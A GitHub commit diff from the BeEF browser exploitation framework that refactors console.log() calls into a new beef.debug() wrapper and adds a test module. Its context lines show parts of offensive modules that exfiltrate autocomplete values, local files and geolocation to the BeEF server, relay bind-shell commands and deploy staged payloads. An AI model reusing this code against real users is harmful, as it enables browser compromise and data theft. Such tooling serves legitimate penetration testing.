Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Part of issue #862 - Add beef.debug() for client-side debugging

Browse Source 
Add `beef.debug()` function - wraps `console.log()`

Debug messages are suppressed for browsers which don't support `console.log()`

Update './core/*' to use `beef.debug()` instead of `console.log()`
Update './modules/*' to use `beef.debug()` instead of `console.log()`
Update './extensions/*' to use `beef.debug()` instead of `console.log()`

Add 'modules/debug/test_beef_debug/' module
This commit is contained in:
bcoles
2013-04-15 16:49:01 +09:30
parent 55b0bee9ca
commit a172362452
18 changed files with 112 additions and 46 deletions
Download Patch File Download Diff File Expand all files Collapse all files

15
core/main/client/beef.js
View File

@@ -31,7 +31,20 @@ if(typeof beef === 'undefined' && typeof window.beef === 'undefined') {
// An array containing all the BeEF JS components.
components: new Array(),
/**
* Adds a function to display debug messages (wraps console.log())
* @param: {string} the debug string to return
*/
debug: function(msg) {
if (typeof console == "object" && typeof console.log == "function") {
console.log(msg);
} else {
// TODO: maybe add a callback to BeEF server for debugging purposes
//window.alert(msg);
}
},
/**
* Adds a function to execute.
* @param: {Function} the function to execute.

4
core/main/client/browser.js
View File

@@ -871,10 +871,10 @@ beef.browser = {
try {
// append hook script
self.frames[i].document.body.appendChild(script);
//console.log("Hooked child frame [src:"+self.frames[i].window.location.href+"]");
//beef.debug("Hooked child frame [src:"+self.frames[i].window.location.href+"]");
} catch (e) {
// warn on cross-domain
//console.log("Hooking frame failed");
//beef.debug("Hooking frame failed");
}
}
},

10
core/main/client/geolocation.js
View File

@@ -32,14 +32,14 @@ beef.geolocation = {
$j.ajax({
error: function(xhr, status, error){
//console.log("[geolocation.js] openstreetmap error");
//beef.debug("[geolocation.js] openstreetmap error");
beef.net.send(command_url, command_id, "latitude=" + latitude
+ "&longitude=" + longitude
+ "&osm=UNAVAILABLE"
+ "&geoLocEnabled=True");
},
success: function(data, status, xhr){
//console.log("[geolocation.js] openstreetmap success");
//beef.debug("[geolocation.js] openstreetmap success");
var jsonResp = $j.parseJSON(data);
beef.net.send(command_url, command_id, "latitude=" + latitude
@@ -64,16 +64,16 @@ beef.geolocation = {
beef.net.send(command_url, command_id, "latitude=NOT_ENABLED&longitude=NOT_ENABLED&geoLocEnabled=False");
return;
}
//console.log("[geolocation.js] navigator.geolocation.getCurrentPosition");
//beef.debug("[geolocation.js] navigator.geolocation.getCurrentPosition");
navigator.geolocation.getCurrentPosition( //note: this is an async call
function(position){ // success
var latitude = position.coords.latitude;
var longitude = position.coords.longitude;
//console.log("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude);
//beef.debug("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude);
beef.geolocation.getOpenStreetMapAddress(command_url, command_id, latitude, longitude);
}, function(error){ // failure
//console.log("[geolocation.js] error [%d] getting position", error.code);
//beef.debug("[geolocation.js] error [%d] getting position", error.code);
switch(error.code) // Returns 0-3
{
case 0:

4
core/main/client/init.js
View File

@@ -32,7 +32,7 @@ window.onpopstate = function (event) {
try {
callback(event);
} catch (e) {
console.log("window.onpopstate - couldn't execute callback: " + e.message);
beef.debug("window.onpopstate - couldn't execute callback: " + e.message);
}
return false;
}
@@ -47,7 +47,7 @@ window.onclose = function (event) {
try {
callback(event);
} catch (e) {
console.log("window.onclose - couldn't execute callback: " + e.message);
beef.debug("window.onclose - couldn't execute callback: " + e.message);
}
return false;
}

2
core/main/client/net/dns.js
View File

@@ -43,7 +43,7 @@ beef.net.dns = {
// sends a DNS request
sendQuery = function(query) {
//console.log("Requesting: "+query);
//beef.debug("Requesting: "+query);
var img = new Image;
img.src = "http://"+query;
img.onload = function() { dom.removeChild(this); }

2
core/main/client/net/xssrays.js
View File

@@ -105,7 +105,7 @@ beef.net.xssrays = {
// util function. Print string to the console only if the debug flag is on and the browser is not IE.
printDebug:function(log) {
if (this.debug && (!beef.browser.isIE6() && !beef.browser.isIE7() && !beef.browser.isIE8())) {
console.log("[XssRays] " + log);
beef.debug("[XssRays] " + log);
}
},

10
extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js
View File

@@ -33,7 +33,7 @@ ZombieTab_IpecTab = function(zombie) {
id = data.id;
},
error: function(){
console.log("Error getting module id.");
beef.debug("Error getting module id.");
}
});
return id;
@@ -110,11 +110,11 @@ ZombieTab_IpecTab = function(zombie) {
async: false,
processData: false,
success: function(data){
console.log("data: " + data.command_id);
beef.debug("data: " + data.command_id);
result = "Command [" + data.command_id + "] sent successfully";
},
error: function(){
console.log("Error sending command");
beef.debug("Error sending command");
return "Error sending command";
}
});
@@ -142,13 +142,13 @@ ZombieTab_IpecTab = function(zombie) {
processData: false,
success: function(data){
$jwterm.each(data, function(i){
console.log("result [" + i +"]: " + $jwterm.parseJSON(data[i].data).data);
beef.debug("result [" + i +"]: " + $jwterm.parseJSON(data[i].data).data);
results += $jwterm.parseJSON(data[i].data).data;
});
},
error: function(){
console.log("Error sending command");
beef.debug("Error sending command");
return "Error sending command";
}
});

17
modules/debug/test_beef_debug/command.js Normal file
View File

@@ -0,0 +1,17 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
try {
var msg = "<%= @msg.gsub(/"/, '\\"') %>";
beef.debug(msg);
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=called the beef.debug() function. Check the developer console for your debug message.');
} catch(e) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=something went wrong&error='+e.message);
}
});

16
modules/debug/test_beef_debug/config.yaml Normal file
View File

@@ -0,0 +1,16 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
test_beef_debug:
enable: true
category: "Debug"
name: "Test beef.debug()"
description: "Test the 'beef.debug()' function. This function wraps 'console.log()'"
authors: ["bcoles"]
target:
working: ["All"]
not_working: ["IE"]

20
modules/debug/test_beef_debug/module.rb Normal file
View File

@@ -0,0 +1,20 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Test_beef_debug < BeEF::Core::Command
def self.options
return [
{'name' => 'msg', 'description' => 'Debug Message', 'ui_label' => 'Debug Message', 'value' => "Test string for beef.debug() function", 'type' => 'textarea', 'width' => '400px', 'height' => '50px' }
]
end
def post_execute
content = {}
content['Result'] = @datastore['result']
save content
end
end

12
modules/exploits/beefbind/beef_bind_shell/command.js
View File

@@ -31,15 +31,15 @@ beef.execute(function () {
xhr.onreadystatechange = function(){
if(xhr.readyState == 4){
var result = strip_output(xhr.responseText);
console.log("result.length: " + result.length);
beef.debug("result.length: " + result.length);
if(result.length != 0){
console.log("get_additional_cmd_results - readyState == 4: request [" + counter + "]\r\n" + result);
beef.debug("get_additional_cmd_results - readyState == 4: request [" + counter + "]\r\n" + result);
beef.net.send("<%= @command_url %>", <%= @command_id %>, result);
counter++;
setTimeout("get_additional_cmd_results()",500);
}
}else{ // No more command results, ready to send another command.
console.log("get_additional_cmd_results - readyState != 4: request [" + counter + "]");
beef.debug("get_additional_cmd_results - readyState != 4: request [" + counter + "]");
}
};
xhr.open("GET", uri, false);
@@ -51,9 +51,9 @@ beef.execute(function () {
xhr = new XMLHttpRequest();
xhr.onreadystatechange = function(){
if(xhr.readyState == 4){
console.log("get_prompt: Retrieved prompt");
beef.debug("get_prompt: Retrieved prompt");
var prompt = strip_output(xhr.responseText);
console.log(prompt);
beef.debug(prompt);
beef.net.send("<%= @command_url %>", <%= @command_id %>, prompt);
//send command
@@ -68,7 +68,7 @@ beef.execute(function () {
xhr = new XMLHttpRequest();
xhr.onreadystatechange = function(){
var cmd_result = strip_output(xhr.responseText);
console.log(cmd_result);
beef.debug(cmd_result);
beef.net.send("<%= @command_url %>", <%= @command_id %>, cmd_result);
};
xhr.open("POST", uri, false);

10
modules/exploits/beefbind/beef_bind_staged_deploy/command.js
View File

@@ -295,7 +295,7 @@ beef.execute(function () {
// this is required only with WebKit browsers.
if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) {
console.log("WebKit browser: Patched XmlHttpRequest to support sendAsBinary.");
beef.debug("WebKit browser: Patched XmlHttpRequest to support sendAsBinary.");
XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
function byteValue(x) {
return x.charCodeAt(0) & 0xff;
@@ -310,7 +310,7 @@ beef.execute(function () {
log("send_stager: stager sent.");
stager_successfull = true;
}catch(exception){
console.log("!!! Exception: " + exception);
beef.debug("!!! Exception: " + exception);
// Check for PortBanning exceptions:
//NS_ERROR_PORT_ACCESS_NOT_ALLOWED: Establishing a connection to an unsafe or otherwise banned port was prohibited
if(exception.toString().indexOf('NS_ERROR_PORT_ACCESS_NOT_ALLOWED') != -1){
@@ -335,13 +335,13 @@ beef.execute(function () {
var uri = "http://" + rhost + ":" + rport + path;
xhr = new XMLHttpRequest();
console.log("uri: " + uri);
beef.debug("uri: " + uri);
xhr.open("POST", uri, true);
xhr.setRequestHeader("Content-Type", "text/plain");
// this is required only with WebKit browsers.
if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) {
console.log("WebKit browser: Patched XmlHttpRequest to support sendAsBinary.");
beef.debug("WebKit browser: Patched XmlHttpRequest to support sendAsBinary.");
XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
function byteValue(x) {
return x.charCodeAt(0) & 0xff;
@@ -362,7 +362,7 @@ beef.execute(function () {
log = function(data){
beef.net.send("<%= @command_url %>", <%= @command_id %>, data);
console.log(data);
beef.debug(data);
};

8
modules/misc/local_file_theft/command.js
View File

@@ -219,9 +219,9 @@ result = '';
function grabFiles(dir,os){
tmpfile = {}
for (i in fileList[os]['post']){
console.log('dir = ' + dir);
console.log('fileList: ' + fileList[os]['post'][i]);
console.log(i);
beef.debug('dir = ' + dir);
beef.debug('fileList: ' + fileList[os]['post'][i]);
beef.debug(i);
tmpfile[i] = new XMLHttpRequest()
tmpfile[i].open ('get',dir+"/"+fileList[os]['post'][i]);
tmpfile[i].send();
@@ -229,7 +229,7 @@ result = '';
tmpfile[i].onreadystatechange=function(){
for (j in fileList[os]['post']){
if(tmpfile[j].readyState==4){
console.log('new returned for: ' + j);
beef.debug('new returned for: ' + j);
result = j +": "+ tmpfile[j].responseText;
beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result);

4
modules/network/internal_network_fingerprinting/command.js
View File

@@ -219,7 +219,7 @@ beef.execute(function() {
for(var u=0; u < urls.length; u++) {
if(!urls[u][3] && ports != null){ // use default port
var img = new Image;
//console.log("Detecting [" + urls[u][0] + "] at IP [" + ips[i] + "]");
//beef.debug("Detecting [" + urls[u][0] + "] at IP [" + ips[i] + "]");
img.id = u;
img.src = urls[u][2]+"://"+ips[i]+":"+urls[u][1]+urls[u][4];
img.onload = function() { if (this.width == urls[this.id][5] && this.height == urls[this.id][6]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'discovered='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } }
@@ -227,7 +227,7 @@ beef.execute(function() {
} else { // iterate to all the specified ports
for(p=0;p<ports.length;p++){
var img = new Image;
//console.log("Detecting [" + urls[u][0] + "] at IP [" + ips[i] + "], port [" + ports[p] + "]");
//beef.debug("Detecting [" + urls[u][0] + "] at IP [" + ips[i] + "], port [" + ports[p] + "]");
img.id = u;
img.src = urls[u][2]+"://"+ips[i]+":"+ports[p]+urls[u][4];
img.onload = function() { if (this.width == urls[this.id][5] && this.height == urls[this.id][6]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'discovered='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } }

2
modules/phonegap/phonegap_geo_locate/command.js
View File

@@ -27,7 +27,7 @@ beef.execute(function() {
// onError Callback receives a PositionError object
//
function onError(error) {
console.log('code: ' + error.code + '\n' +
beef.debug('code: ' + error.code + '\n' +
'message: ' + error.message + '\n');
}

18
modules/phonegap/phonegap_persistence/command.js
View File

@@ -26,12 +26,12 @@ beef.execute(function() {
function write_file(text) {
function fail () {
console.log('write_file fail')
beef.debug('write_file fail')
}
function gotFileWriter(writer) {
writer.onwrite = function(evt) {
console.log("write success");
beef.debug("write success");
}
writer.write(text);
}
@@ -59,14 +59,14 @@ beef.execute(function() {
function read_index(app_name) {
function fail () {
console.log('read_index fail')
beef.debug('read_index fail')
}
function readFile(file) {
var reader = new FileReader();
reader.onloadend = function(evt) {
//console.log("Read as text");
console.log(evt.target.result);
//beef.debug("Read as text");
beef.debug(evt.target.result);
replace_text(evt.target.result);
};
reader.readAsText(file);
@@ -86,14 +86,14 @@ beef.execute(function() {
function locate() {
function result(entries) {
console.log('result');
beef.debug('result');
var i;
for (i=0; i<entries.length; i++) {
// looking for <something>.app
var re = new RegExp(/^[a-zA-Z0-9]*\.app/)
var match = re.exec(entries[i].name)
if (match) {
console.log('found ' + entries[i].name);
beef.debug('found ' + entries[i].name);
// look for ../<something>.app/www/index.html
read_index(entries[i].name);
@@ -107,11 +107,11 @@ beef.execute(function() {
function fail() {
console.log('fail');
beef.debug('fail');
}
function win(entries) {
console.log('win');
beef.debug('win');
result(entries);
}

2
modules/social_engineering/autocomplete_theft/command.js
View File

@@ -44,7 +44,7 @@ beef.execute(function() {
var val = JSON.stringify({'input':n,'value':v});
if (v != "" && !inArray(val,results)){
results.push(val);
//console.log(val);
//beef.debug(val);
beef.net.send('<%= @command_url %>', <%= @command_id %>, "results="+val);
}
}

2
modules/social_engineering/clippy/command.js
View File

@@ -291,7 +291,7 @@ Clippy.prototype.findHomeBase = function(selector) {
}
console.log(ref);
beef.debug(ref);
return ref;
}